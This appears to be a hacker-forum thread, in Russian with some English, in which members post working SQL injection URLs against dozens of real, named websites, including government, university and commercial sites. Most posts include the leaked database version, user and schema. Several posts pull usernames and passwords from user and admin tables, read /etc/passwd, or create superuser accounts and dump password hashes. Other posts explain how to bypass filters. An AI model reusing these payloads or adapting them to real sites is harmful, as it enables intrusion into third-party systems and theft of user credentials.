http://brainattack.ru/articles.php?a_id=-5+union+select+group_concat(u_login,0x3a,u_pass),2 ,3,4+from+tbl_brain_users--
Пассы в открытом виде +WMZ
http://versaledreams.ru/index.php?id=7/**/union/**/select/**/1,2,3,4,5,6,7--
HellFire
23.12.2010, 05:49
Всем испанский туризм пасаны:
Code:
http://www.alavaturismo.com/es/ficha.php?id=363-1.1+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT( 0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Da tabase(),0x2F2A2A2F,User(),0x7873716C696E6A656E64) ,0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
Database Version: 4.1.11-Debian_4sarge8-log
Database name: bd391578
User name: ADM_bd391578@217.116.0.23
...и биология:
Code:
http://www.everythingbio.com/glos/definition.php?ID=-1+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x 7873716C696E6A626567696E,Version(),0x2F2A2A2F,Data base(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0 x71),0x71),3,4,5,6,7,8,9--
Database Version: 5.0.83-log
Database name: everythi_tables
User name: everythi_phpAds@boscgi0603.eigbox.net
Code:
http://l2.naturalbornkillers.it/index.php?action=show;type=quest;id=195+union+sele ct+version%28%29+--+
Вывод в title, там же стоит smf второй версии (чтоб не выискивать имена таблиц).
Админ:
Code:
/// dell
JohnnyBGoode
23.12.2010, 23:25
http://www.nds-sochi.ru/article.php?id=-23008+union+select+1,2,concat_ws(0x3a,version(),us er(),database()),4,5+--+
5.0.90:u10270@78.108.81.111:b10270
http://sensation.ntv.ru/archive.jsp?iid=71731+and+to_char(11)=to_char(1)|| to_char(1)+--+
http://sensation.ntv.ru/archive.jsp?iid=71731+and+to_char(11)=to_char(1)|| to_char(0)+--+
Тут blind oracle походу.Как дальше крутить хз
Code:
http://wincmd.ru/user/1391063'+and+1=2+union+select+1,2,3,concat(user(), 0x3a,version(),0x3a,database()),5,6,7+--+'.html
wincmd_feinx@localhost : 4.1.22-standard : wincmd_db
Ы_ы
www.hardsextube.com/share.php?vid=-199646+or 1=0+UNION SELECT 1,file_priv,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,5 1,52,53,54,55,56 from mysql.user--
AR 255 many many traff
Code:
http://www.kasting.ru/library/show_user_photo.php?photo_id=1175260000+union+sele ct+1,2,3,version(),4+--+&uid=31853
5.1.49-Max-log
юзеры - u_main (log и pw - юзер и пасс). Всё в открытом виде, но генерятся сайтом.
На поддомене датинг висит, тоже покопать можно - http://love.kasting.ru
http://scores.crazymonkeygames.com/hs/listscores.php?id=-1+UNION+SELECT+concat_ws(0x3a,USER(),DATABASE(),VE RSION()),2,3,4,5+FROM+information_schema.tables--
Today's crazymon_hs@cmgn-n2-int:crazymon_highscores:5.0.27-standard High Scores
ну вы понеле, вывод в тайтле
Code:
http://www.designarkivet.se/index.php?pageid=123%27%20AND%201=0%20union+select +1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,concat_ws%280x3a,version%28%29,user%28%29,dat abase%28%29%29,23,24,25,26,27,28,29,30,31+--+
Версия MySQL 4.1.22-community-nt
Имя пользователя cms@localhost
Имя БД cms_designarkivet
http://iw-shop.ru/index.php?ukey=news&blog_id=(select+1+from+(select+count(0),concat((se lect+version()),floor(rand(0)*2))+from+SC_news_tab le+group+by+2+limit+1)a)--+
good.god
25.12.2010, 22:18
Code:
http://www.ogm-bodyboard-shop.com/bodyboard_shop.php?num=1-999.9+union+select+1,2,3,4--
версия 5.0.90-log
бд ogmbodyb002@10.0.63.124
имя ogmbodyb002
Hack_ERR++
25.12.2010, 23:15
Code:
http://cps.softex.br/noticia_interna.php?id=-1433+union+select+1,2,3,4,5,6,7,8,concat_ws(0x20,i d,email,login,senha),10,11,12,13,14,15,16,17+from+ tbUsuarios--
DezMond™
26.12.2010, 20:19
Вроде как не баян, проверял
msi.com тИЦ — 1000 PR — 7
Code:
http://ru.msi.com/program/products/vga/vga/pro_vga_detail_new.php?UID=-21149+union+select+1,group_concat(table_name),3,4, 5,6,7,8,9,10,11,12+from+information_schema.tables+ where+table_schema='msi'+--+
Hack_ERR++
27.12.2010, 14:43
Code:
http://www.poroszlo.hu/en/szallas.php?id=-10+union+select+1,version(),3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24--
http://inita.hu/references/ref.php?id=-10+union+select+1,table_name,3,4,5,6,7,8+from+info rmation_schema.tables--
satana-fu
28.12.2010, 14:43
http://forsmaster.ru/index.php?id=-53+union+select+1--
https://epark.ttu.edu/parking_web/news/news.php?dnf_id=14+union+select+null,to_char(table _name),null,null+from+sys.all_tables
http://video.rosbalt.ru/channel_detail.php?chid=-29 union select 1,user(),group_concat(email,username,pwd),4,5,6,7, 8,9,10,11,12,13,14,15,16 from signup--+7
http://www.khanscope.com/productdetails.cfm?productID=1194+or+1+group+by+co ncat(version(),floor(rand(0)*2))having+min(0)+or+1--
Hack_ERR++
31.12.2010, 12:06
Code:
http://php88.free.fr/bdff/act.php?ID=-2010+union+select+1,2,version(),4--
http://motocykel.sk/clanok.php?id=-2010+union+select+1,version(),3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18--
http://www.raonsims.com/item/detail.php?num=-1+union+select+1,2,3,4,5,6,7,8,9+--+
Путь к месту расположения скрипта:
/home/hosting_users/skysj48/www/item/detail.php
MySQL Version: 4.0.22-log
Database Name: skysj48
Username: skysj48@localhost
Code:
http://www.hammer-marcopolo.de/links/links.php?cat_id=-47+and+1=0++and+1=0++and+1=0+=null=null+Union+Sele ct+1,2,3,4,5,6,7,0x4861636B656420627920494E432E,9, 10,11,12,13,14,15,16,17,18--
Hack_ERR++
02.01.2011, 17:27
Code:
http://www.rek.ee/eng/ettevote.php?id=32+and+substring(version(),1,1)=5
// http://www.rek.ee/eng/ettevote.php?id=32+and+1=0+union+select+1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30,31
http://www.elephant.se/location2.php?location_id=1%27%20union%20select%20 1,2,3,concat_ws%28%27:%27,version%28%29,user%28%29 ,database%28%29%29,5,6,7,8,9,10--+
5.0.51a-24+lenny4-log
elephant_se@srv8.one.com
elephant_se
good.god
02.01.2011, 23:43
Code:
http://www.indiacon.com/businesscards.php?Id=1-2.1+union+select+1,2,3,group_concat(table_name),5, 6,7,8,9,10,11,12,13+from+information_schema.tables--
5.0.91-community-log
indiacon@localhost
indiacon
DeepBlue7
03.01.2011, 03:20
Code:
http://www.lokomotive.lv/index.php?cat=1&subrubid=1378+and+1=0+union+select+1,2,3,concat_ws (0x2f,version(),user(),database()),5,6,7,8,9,10,11
Version : 5.0.75-0ubuntu10.05-log
user : vagels@localhost
db : vagels
Code:
http://www.gamesmarket.com.au/info.php?type=90+and+0+union+select+1,2,concat_ws% 280x3a,user%28%29,database%28%29,version%28%29%29, 4,5,6--+
vs80127_1_dbo[@]bne2-0030dp.server-web.com:vs80127_1:4.0.24-nt-max-log
good.god
06.01.2011, 23:17
Code:
http://www.suncellular.com.ph/phone_detail.php?id=-79+union+select+1,group_concat(table_name),3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29,30,31,32+from+information_schema. tables+--+
5.0.91-community
suncell@localhost
suncellular
в таблице auths поля user и pass. но вот достать не получается, доступа чтоли к таблице нет
PR -5
Имя БД; db_hospiz
Версия БД: MySQL 4.1.10a-Max-log
Имя пользователя БД; cl_hospiz@localhost
Эксплойт:
Code:
http://www.deutscher-kinderhospizverein.de/42_ambulante_einzel_wir.php?id=-1+union+select+1,2,3,4,5,aes_decrypt(aes_encrypt(c oncat_ws(' ; ',DATABASE(),USER(),VERSION()),0x71),0x71),7+--+
PR -4
Имя БД; DB325512
Версия БД: MySQL 5.0.91-log
Имя пользователя БД; U325512@bignurker.st
Эксплойт:
Code:
http://www.genuin.de/en/04_d.php?k=-1%27+union+select+1,user%28%29,group_concat%28tabl e_name%29,4,5,database%28%29,version%28%29,8,9,10, 11,12+from+information_schema.tables+--+
good.god said:
в таблице auths поля user и pass. но вот достать не получается, доступа чтоли к таблице нет
Code:
http://www.suncellular.com.ph/phone_detail.php?id=-79+union+select+1,concat(user,0x3a,pass),3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29,30,31,32+from+cphulkd.auths limit 1+--+
Та, вроде бы, все нормально получается ^_^
Hack_ERR++
07.01.2011, 17:47
Code:
http://kalakkalcinema.com/tamil_detail.php?id=-323+union+select+1,2,3,group_concat(column_name),5 ,6,7,8,9,10,11,12,13,14+from+information_schema.co lumns+where+table_name=0x74626c5f61646d696e--
http://www.verdammnis.com/pictures.php?id=-323+union+select+1,unhex(hex(table_name)),3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33+from+information_schem a.tables--
http://www.pesic.name/slika.php?id=-323+union+select+1,2,3,table_name,5,6,7,8,9,10+fro m+information_schema.tables--
http://www.thecommunitylibrary.org/calendar.php?cID=55+and+length(char(1))!=1+union(s elect+1,2,3,4,5,6,7)
good.god
08.01.2011, 00:17
Code:
http://www.supairball.com/site2008/2nd.php?n=9-1+union+select+1,concat_ws('%20;%20',database(),us er(),version()),group_concat(table_name),4,5,6,7,8 ,9+from+information_schema.tables--
supairball
supairball@wtc40.zarcrom.net
5.0.67-0ubuntu6-log
Code:
http://www.salasbingo.com/en/casino.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+--+
5.0.91-log
winzingo
winzingo@173.201.216.78
при information_schema.tables, как я понял, union фильтруется, обойти не получилось. При простом переборе вроде наткнулся на таблицу с юзерами, а именно w.user, но пишет что-то типа нет прав для чтения этой таблицы(может и ошибаюсь). Это я всё про последнее...
look2009
08.01.2011, 04:22
http://www.mattmo.nl/detail.php?project=125/**/union/**/select/**/USER(),2,3--
root@localhost
5.0.45-log
mattmo
---------
http://www.travelersjournal.com/articles2.php?ID=233/**/union/**/select/**/1,USER(),DATABASE(),4,VERSION(),6,7--
travjourn
travjourn@localhost
4.1.22
Code:
http://www.smokycarrot.com/index.php?rubID=0+union +select+1,2,3,version(),5,6,7 ,8,9,10,11,12,13,14,15--
Version - 5.0.67-log
User - smokycarrot@imu116.infomaniak.ch
Database - smokycarrotcom
http://www.newacropol.ru/na/russia/entry/?id=-1088%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12 ,13,14,concat_ws(0x3a,cal_login,cal_passwd),16,17, 18,19,20%20from%20afisha.webcal_user%20limit%200,1--
Version - 5.0.67
Database - afisha
ТИЦ400 PR5
PR -4
Имя БД; shropshi_sccc
Версия БД: 5.0.89-community
Имя пользователя БД; shropshi_sccc@localhost
Эксплойт:
Code:
http://www.shropshireccc.co.uk/newsarticle.php?ID='+union+select+1,concat_ws('~', id,username,password),null,4,null,6+from+als3_user s+--+
PR -2
Имя БД; heidi
Версия БД: MySQL 4.1.20
Имя пользователя БД; heidi_f@localhost
Эксплойт:
Code:
http://www.chinahiking.cn/hike.php?r=-1+union+select+1,2,3,4,5,6
cy 10
pr 1
espetsmash_cu@localhost
espetsmash_cu
5.0.77
Code:
http://eshop-spetsmash.kiev.ua/index.php?w=article&lang=ru&id=-3%20union%20select%201,VERSION%28%29,USER%28%29,DA TABASE%28%29,5
information_schema доступна
good.god
10.01.2011, 21:20
Code:
http://ww.sexshop.com.pl/en/zamow.php?id=-1+union+select+1,version(),3,4,5,database(),user() ,8,9,10,11,12,13+--+
5.0.91-log
hipermedia
hipermedia@localhost
Code:
http://www.f1shop.ru/goods2.php?num=-1+union+select+1,version(),3,4,5,6,7,8,database(), user(),11,12+--+
5.0.90
u89072@78.108.84.101
b89072_f1shop
http://www.designtrust.com/english/document_2.php?did=67+or+1+group+by+concat(version (),floor(rand(0)*2))having+min(0)+or+1--
http://www.cursodepintura.com.br/?c=Id%C3%A9ias&n=5118+and+1=(select+version()::int+from+pg_user)
http://www.acmeunited.com/acme_west/index.php?did=1796+or+1+group+by+concat((select+co ncat_ws(0x3a,username,password)+from+cms_users+lim it+2,1),floor(rand(0)*2))having+min(0)+or+1--&sname=Products
pornoxo.com/templates/related.php?c=0&id=-13719+or+1=0+union select 1,version()--
Болтается на 5-ке
Mr.Br0wn
11.01.2011, 08:01
http://www.cretonnerre.be/news/comment.php?id=126+and+1=0+union+select+1,2,3,4,co ncat_ws(0x3a,version(),user(),database())--
Version: 5.0.51a-24+lenny4-log
User: cretonnerre@localhost
Database: cretonnerre
http://www.cretonnerre.be/admin/
good.god
11.01.2011, 17:51
Code:
http://www.zrelishe.ru/module/kino/view_film.php?id=-1+union+select+1,group_concat(name,0x3a,password), 3,4,5,6,7,concat_ws(0x3a3a,user(),version(),databa se()),9,10,11,12,13,14,15+from+frb_users+--+
zrelishe@localhost
5.1.35-log
zrelishe
Code:
http://nicecasino.net/index.php?id=16-999.9+union+select+1,2,concat_ws(0x3a,version(),da tabase(),user()),4,5,6,7,8,9,10,11+--+
5.0.91-log
petermol_lz
petermol@grid04.agnat.pl
Dr..VATSON
13.01.2011, 02:51
http://www.arashido.com/calendar.php?id=-171+union+select+1,concat_ws(0x3a,adminUserName,ad minPassword),3,4+FROM+config%20--
http://www.arashido.com/login.php
LiRvD082
13.01.2011, 12:44
Давно меня не было
http://rusuper.ru/objs/view1.php?id_city=30&id_obj=-3251+UNION+SELECT+1,2,3,group_concat(unhex(hex(col umn_name))),5,6,7,8,9+FROM+INFORMATION_SCHEMA.colu mns+where+table_name=0x7573657273--
LiRvD082
13.01.2011, 12:46
И ещё парочка:
http://avon.co.in/productdetails.php?pid=-99+UNION+SELECT+1,2,login,4,5,6,7,8,9,10,password, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29+FROM+admin--
http://990909.ru/index.php
?podrobno=-16+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,GROUP_CONCAT(COLUMN_NAME),35,36,37,38,39,40, 41,42,43,44,45,46,47+FROM+INFORMATION_SCHEMA.COLUM NS+WHERE+TABLE_NAME=0x61646d696e--
http://www.magnifix.co.nz/magnifix/showproduct.php
?id=24+UNION+SELECT+version(),1,2,3/*
ты думаеш такой хитрый что можеш постить скули сразу в двух форумах?
предупреждаю последний раз, не делай так, все равно все сообщения будут удалены.
//Злой модер!
Code:
http://autoob.ru/avtomobil/view.php?id=0+union+select+1,2,3,4,5,6,7,8,9,10,11 ,concat_ ws(0x3a,version(),user(),database()),13,14,15
Version: 5.0.77-log
User: eresik_autoob@localhost
Database: eresik_autoob
-----
Code:
http://rusuper.ru/index1.php?id_city=-20+union+select+1,conc at_ws(0x3a,version(),user(),database()),3,4
Version: 5.0.77-log
User: eresik_rusuper@localhost
Database: eresik_rusuper
п.с. Увидел, что этот сайт уже тут выложен, но уязвимость на другой странице, думаю можно оставить?)
nemaniak
13.01.2011, 23:02
www.newmp.org.uk PR-5
Code:
http://www.newmp.org.uk/article.php?categoryid=100&articleid=-1692+union+select+1,2,3,4,5,6,7,8,9,0,concat_ws(0x 3a,version(),user(),database()),12+--+
Code:
5.0.77:newmp@localhost:newmp
www.blizzard.com.ua
Code:
http://www.blizzard.com.ua/article.php?id=-142+union+select+1,2,3,concat_ws(0x3a,version(),us er(),database()),5,6,7,8+--+
Code:
5.0.77:blizzard@localhost:db_blizzard
Code:
http://moreprom.ru/article.php?id=-1+union+select+1,concat_ ws(0x3a,version(),user(),database()),3
Version: 5.1.34
User: alo_moreprom@192.168.1.15
Database: alo_moreprom
------
Code:
http://www.dzogchenlineage.ru/modules/publication/article.php?id=40+union+select+1,concat_ ws(0x3a,version(),user(),database()),3,4,5,6,7,8
Version: 5.1.41-log
User: shrisingha_mysql@10.1.162.25
Database: shrisingha_db
-----
PR-4 Мне почему-то кажется что тут можно провести инклуд, но я не знаю как
Code:
http://www.artveras.com/page.php?rubID=-60+union+select+1,2,3,4,5,6,7,8,9,10,concat_w s(0x3a,version(),user(),database()),12,13,14,15,16--
Version: 5.0.67-log
User: monolocoart@imu122.infomaniak.ch
Database: artverasch
и ещё немного скулей
www.sonnmatten.ch
Code:
http://www.sonnmatten.ch/page.php?rubID=-11+union+select+1,2,3,concat_ ws(0x3a,version(),user(),database()),5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20--
Version:4.1.20
User:sonnmatten@localhost
Database:sonnmatten1
---
www.geneuro.com
Code:
http://www.geneuro.com/index2.php?rubID=-5+union+select+1,2,3,4,concat_ ws(0x3a,version(),user(),database()),6,7,8,9,10,11 ,12,13,14,15--
Version:5.0.77
User:ad12343@localhost
Database:db12343_geneuro
---
www.klass-electronics.com
Code:
http://www.klass-electronics.com/shop/lire/index.php?rubid=-8+union+select+1,2,3,concat_ ws(0x3a,version(),user(),database()),5,6,7,8--
Version:4.0.25-standard-log
User:klassele@10.0.75.168
Database:klassele
---
www.pick-et-boch.com
Code:
http://www.pick-et-boch.com/anglais/showrub.php?rubid=-5+union+select+1,2,3,4,5,concat_ ws(0x3a,version(),user(),database()),7,8,9--
Version:5.0.51a-24+lenny4-log
User:umigonda@ht10.idep.us
Database: pich
---
www.bolleboosje.be
Code:
http://www.bolleboosje.be/shop/index.php?rubId=-1+union+select+1,concat_ ws(0x3a,version(),user(),database()),3
Version:5.0.91-community
User:bolleboo@localhost
Database:bolleboo_menhir
---
www.make-a-wish.ch PR-5
Code:
http://www.make-a-wish.ch/index.php?rubID=-10+union+select+1,2,3,concat_ ws(0x3a,version(),user(),database()),5,6,7,8,9,10, 11,12,13,14,15,16,17--
Version:5.0.84-log
User:monolocomaw@imu94.infomaniak.ch
Database:make-a-wishch
---
www.ariellavillas.com
Code:
http://www.ariellavillas.com/page.php?rubID=2&lan=es&villaID=-73+union+select+1,2,3,concat_ ws(0x3a,version(),user(),database()),5,6,7,8,9,10, 11,12,13,14,15,16,17,18--
Version:5.0.67-log
User:ariellasvillas@imu148.infomaniak.ch
Database:ariellasvillascom
---
www.hibiscus-design.fr
Code:
http://www.hibiscus-design.fr/shop/lire/index.php?rubid=-64+union+select+1,2,3,concat_ ws(0x3a,version(),user(),database()),5,6,7,8--
Version:5.1.41-3ubuntu12
User:hibiscusdesignfr@88.190.253.56
Database:hibiscusdesignfr
DezMond™
15.01.2011, 02:59
contratacionesune.une.com.co
Code:
http://contratacionesune.une.com.co/detalle-contrato.php?id=100024+union+select+1,table_name,3 ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32+from+information_s chema.tables+--+
Code:
http://une.com.co/servicioalcliente/index.php?option=com_formularios&module=solicitudproducto&Itemid=118&uen=1+UnIon+SeLEct+1,2+from+uneprod_tarificadordes arrollo.tblpymes_ciudades+--+
usadba.by ТИЦ20 PR3
Code:
http://www.usadba.by/int_page.php?id_get=-195+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a3 a,ID,USER,PASS),11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55 ,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,7 2,73,74,75,76,77,78,79,80,81,82,83,84,85+from+USER S+--+
bad-segeberg.dlrg.de
Code:
http://bad-segeberg.dlrg.de/termine.html?tx_dlrgterminkalender_pi1%5Baction%5D =read&tx_dlrgterminkalender_pi1%5Btid%5D=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16/**/+be_users+--+&cHash=dae5a5fda1c887ce9ad1f8b8a55f7874
dreamtime.botg.de
Code:
http://dreamtime.botg.de/index.php?id=683&tx_t3primarix_pi1%5BshowUid%5D=30554+union+select+ 1,2,database()+--+&tx_t3primarix_pi1%5Baction%5D=single&tx_t3primarix_pi1%5Blang%5D=CH&tx_t3primarix_pi1%5Bmode%5D=trips&tx_t3primarix_pi1%5Breisetitel%5D=Traumreise%20Tah iti&tx_t3primarix_pi1%5Breiseland%5D=Franz%C3%B6sisch-Polynesien&tx_t3primarix_pi1%5Breiseort%5D=20%20Tage%20Inselk ombination&cHash=2c9892ce3dfb2089b19d51a53fbbb560
jedek-reisen.at
Code:
http://www.jedek-reisen.at/afrika/namibia/unterkuenfte/unterkuenftedetails.html?tx_t3primarix_pi1%5BshowU id%5D=36240'+union+select+LOAD_FILE(0x2F6574632F70 6173737764)+from+mysql.db+--+&tx_t3primarix_pi1%5Baction%5D=single&tx_t3primarix_pi1%5Blang%5D=D&tx_t3primarix_pi1%5Bmode%5D=hotels&tx_t3primarix_pi1%5Breisetitel%5D=Onguma%20Tree%20 Top&cHash=4162bb91d6f2e3de4dc64aff5996a844
www.flick.co.nz
Code:
http://www.flick.co.nz/index.php?page_code=articleHP&article_id=-16+union+select+1,2,3,group_concat(column_name),5, 6+from+information_schema.columns+where+table_name =0x74626C5F726567697374657265645F75736572+--+
good.god
15.01.2011, 10:04
Code:
http://help.sevstar.net/article.php?id=-1+union+select+1,2,3,group_concat(name,0x3a,passwo rd),5,6+from+anime.dle_users+--+
help
help@localhost
5.0.51a-24+lenny4
http://www.pusk12.ru/shop/about.php?id=-7+union+select+1,2,user(),4,5,6,7--
http://aging.wisc.edu/research/affil.php?Ident=-67%20union%20select%201,2,concat_ws(0x3a,version() ,user(),database()),4,5,6,7,8,9,10,11,12--
Version - 5.0.22-standard
User - webbyftpuser@localhost
Database - Affil-Train 4
ТИЦ1700 PR8
http://www.terracap.df.gov.br/internet/index.php?sccid=35;create user stranger;
http://www.terracap.df.gov.br/internet/index.php?sccid=35;alter user stranger createuser createdb;
http://www.terracap.df.gov.br/internet/index.php?sccid=35;select cast(usename||chr(58)||passwd as int) from pg_shadow;
5.0.77-log
http://www.educacion.gov.ec/interna.php?txtCodiInfo=2+and+1=0+union+select+1,2 ,3,4,5,6,7,8,9,10--
http://www.allrussia.ru/cgi-bin/atlas_look.cgi?id=-240%20and%201=2%20union%20select%201,2,concat_ws(0 x3a,version(),user(),database(),@@version_compile_ os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25,26,27,28--
5.0.77:micke@localhost:allrussia:redhat-linux-gnu
http://www.dashu-house.gov.tw/bexfront.php?sid=bmddyna&item=detail&class=16&id=138;create user ForsakeR with password $$antichat$$;
http://www.dashu-house.gov.tw/bexfront.php?sid=bmddyna&item=detail&class=16&id=138;alter user ForsakeR superuser;
http://www.dashu-house.gov.tw/bexfront.php?sid=bmddyna&item=detail&class=16&id=138;select cast(usename||chr(58)||passwd as int) from pg_shadow;
http://www.bernegger.at/text/text.php?ID=-207+UNION+SELECT+1,2,3,4,5,6,7,concat_ws(0x3a,vers ion(),database(),user()),9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50, 51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67 ,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,8 4,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100 ,101,102+--+
Database Version: 5.0.51a-24+lenny4
Database name: web_bernegger_01
User name: web_bernegger@localhost
http://www.rainer.lv/?l=2&m=150&id=1106;create user Depart3r with password $$qwerty$$
http://www.rainer.lv/?l=2&m=150&id=1106;alter user Depart3r superuser;
Еще немного от меня
У всех большой AR
www.nuggettube.com/videos/player.php?from=a&id=-1131609+or+1=0+union select 1,2,user(),4,5,6--
5ка
blog.entrepreneur.com/contributor-profile.php?author_id=19'+or+1+group+by+concat(ver sion,floor(rand(0)*2))having+min(0)+or+1--+
5ка
hunterdonads.nj.com/branding/advance/site_map.php?sfid=3&banner=branding/advance/Hunterdon/banner.jpg&sfid=-3+or+1=0+UNION SELECT 1,2,file_priv,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30 from mysql.user--
5ка+имеем ФП
marketing.allbusiness.com/widgets/termres.php?id=1+or+1=0+union%20select%201,%27asa% 27,3,4,5,6--
5ка :0...легендарный албизнес
www.th.boots.com/2009/eng/brands_cat.php?brand_id=-22+or+1=0+union select 1,version(),3,4,5,6--
5ка
http://www.sunporno.com/video.php?cc=2&rnd=92&id=-17604/**/or/**/1=0/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,table_name,41/**/from/**/information_schema.tables
5ка+небольшой фильтр %20 ))
good.god
21.01.2011, 13:43
Code:
http://www.whatsonwilmington.com/eventList.php?category_id=1-999.9+union+select+1,2,3,4,5,group_concat(user_log in,0x3a,user_pass)+from+wilmwow.wp_nbhjc0_users
5.1.39-log
wilmwow
wilmwow@tirane.dreamhost.com
Законодательное Собрание Ростовской области
http://www.zsro.ru/index.php4?mod=nw&news_id=1109+and+1=(select version()::int from pg_user)
// превед бро)
http://www.africansuccess.org/visuFiche.php?id=-72+union+select+1,2,version(),4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26--+&lang=en
Хай! Конки )
ttp://www.step1.it/tribu_di_zammu.php?sez=post&id=-37736+union+all+select+0,concat_ws(char(58),@@vers ion,user(),database()),2--
в title
COOLBOY007
24.01.2011, 18:32
Code:
http://wartegg.ch/kultur.php?do=detail&id=-238+union+select+1,2,3,4,version(),6,user(),8,9,10 ,11,12,13,14,15+--+
Google PR 4
тИЦ 10
Законодательное Собрание Иркутской области
http://old.irk.gov.ru/index.php?resultpage=2&IdAction=docs&Event=section&id=51%20and%20substring(@@version,1,1)=4
Законодательное Собрание Пермского края
http://www.parliament.perm.ru/meeting/index.php?ID=87&ID2=-125%20union%20select%201,2,concat_ws(0x3a,user(),v ersion(),database()),4,5,6,7,8,9,10,11,12,13,14,15 ,16--
Comrad777
25.01.2011, 00:51
http://mynotebook.in/pages.php?page_id=73+and+bin(15)!=1111+union(selec t+distinct+1,2,3,4,5,6,7,group_concat(uname,':',pw ord)+from+mnb_members+where+pword+between+0+and+1+ order+by+uname+asc)
PR=3 ТИЦ=170
http://www.inoxpoint.ru/news.php?nid=74+UNION+SELECT+CONCAT(0x7873716C696E 6A626567696E,(SELECT+CONCAT(TABLE_NAME,0x7873716C6 96E6A64656C,TABLE_SCHEMA)+FROM+INFORMATION_SCHEMA. TABLES+LIMIT+1,1),0x7873716C696E6A656E64)+LIMIT+1, 1/*
Database Version: 4.1.25-log
Database name: wwwinoxpointru_inoxbd
User name: inoxpoin@localhost
http://www.csufresno.edu/library/spotlight/item.php?spotlight=1+union+select+1+from(select+co unt(*),concat((select+concat_ws(0x3a,user,password ,file_priv)+from+mysql.user+limit+1,1),floor(rand( 0)*2))x+from+information_schema.tables+group+by+x) a
http://www.zwerg-schnauzer.info/search.php?Kennel=273+union+select+1,2,3,4,5,6,ver sion(),8,9--
Host IP: 77.222.40.111
Web Server: Apache/1.3.37-lk.d (Unix) mod_defer/0.1.lk mod_python/2.7.11 Python/2.4.3 PHP/4.4.4 mod_dp/lk.0.4.4
Powered-by: PHP/4.4.4
DB Server: MySQL >=5
Current User: rustrake_mini@localhost
http://banki.volgograda.ru/index.php?news=-1346%20and%201=2%20union%20select%201,2,concat_ws( 0x3a,@@version,user(),database(),@@version_compile _os),4,5,6,7,8--
4.0.27-max-log madara66@v43.valuehost.ru madara66 unknown-freebsd4.7
http://www.jewishbelarus.org/index.php?pid=25+union+select+1,2,3,user%28%29,5%2 0--+
Hack_ERR++
06.02.2011, 00:01
Code:
http://www.mrotb.com.au/viewproduct.php?sid=-26+union+select+1,2,3,4,5,6,7,8,9,version(),11,12, 13,14,15--
Cennarios
06.02.2011, 02:36
Во поперло =)
http://www.1eurohosting.eu/default2.php?page=faq&faqcat_id=&faq_id=-53+union+select+1,2,3,4,user(),6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21--+
BARAKASH
06.02.2011, 18:14
http://www.34x.ru/pages.php?id=12+AND+ascii(lower(substring(database (),1,1)))>115+--+
version: 5.1.42
database(): analyti4_test
user(): analyti4
Онлайн игра похоже.
https://www.piratesdinneradventure.com/tickets/select_show.php?id=2+and((select+ascii(substring(t able_name,1,1))+from+information_schema.tables+lim it+0,1)=67)+--
Hack_ERR++
13.02.2011, 20:24
Code:
http://www.erau.ee/article.php?sid=-147+union+select+1,2,3,4,5,version(),7,8,9,10,11,1 2--
http://www.bigbay.bz/imagepop.php?id=-95+union+select+1,2,3,version()--
http://www.edim.ir/show.php?id=-81+union+select+1,version(),3,4,5,6,7,8,9,10,11,12 ,13--.
http://www.hsg.pl/en/index.php?id=-10+union+select+1,2,3,4,version(),6--
http://i-bot.com.au/ai2/page.php?sId=-38+union+select+version(),2--
Cennarios
14.02.2011, 14:40
http://www.y12.doe.gov/news/release.php?id=201+union+select+1,2,3,4,5,6,7,8,9, 10,11--+
http://www.whwebhosting.com/whmsys/announcements.php?id=-1'/**//*!union*//**//*!select*//**/1,2,version(),4,5/**/--+
http://webcolos.de/site/index.php?id=3310&pakketnummer=1'+union+select+1,user(),3,4,5,6,7--+
http://www.mainbase.de/news.php?id=-6+union+select+1,2,version(),4,5,6,7--+
